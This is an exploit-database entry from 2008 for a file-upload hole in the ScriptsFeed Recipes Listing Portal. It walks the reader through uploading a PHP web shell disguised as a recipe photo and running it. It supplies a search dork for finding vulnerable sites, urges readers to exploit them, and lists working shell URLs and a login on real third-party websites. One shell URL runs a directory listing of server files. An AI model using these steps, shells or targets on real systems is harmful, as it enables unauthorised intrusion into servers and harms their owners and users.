ScriptsFeed SF Recipes Listing Portal Remote File Upload Vulnerability

2008-11-13T00:00:00
ID EDB-ID:7112
Type exploitdb
Reporter ZoRLu
Modified 2008-11-13T00:00:00

Description

ScriptsFeed (SF) Recipes Listing Portal Remote File Upload Vulnerability. CVE-2008-6942,CVE-2008-6943,CVE-2008-6944. Webapps exploit for php platform

                                        
                                            [~] ScriptsFeed (SF) Recipes Listing Portal Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 13.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] my bug number now: 39
[~]
[~] my target bug number: 100
[~]
[~] dork: allinurl:"recipedetail.php?id="  ( çok site var sömürün : ) )
[~]
[~] -----------------------------------------------------------


Exploit:

http://localhost/script/pictures/[id]your_shell.php

you register to site 

register: http://localhost/script/register.php

after you login to site

login: http://localhost/script/login.php

more after you click to "Add a Recipe" and add recipe

and after click to "View your Recipes" click to you recipe open new page 

right click to your photo. select properties copy photo lick

and paste your explorer go your shell

your_shell.php path:

http://localhost/script/pictures/[id]your_shell.php



rfu for demo:

user: zorlu

passwd: zorlu1

shell path:

http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php



example 2: 

user: zorlu

passwd: zorlu1

shell:

http://onlineyemektarifi.com/pictures/1226598952c.php? ( hemen indexlemeyin kurcalayIn serverI )

misal:

http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler )


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-13]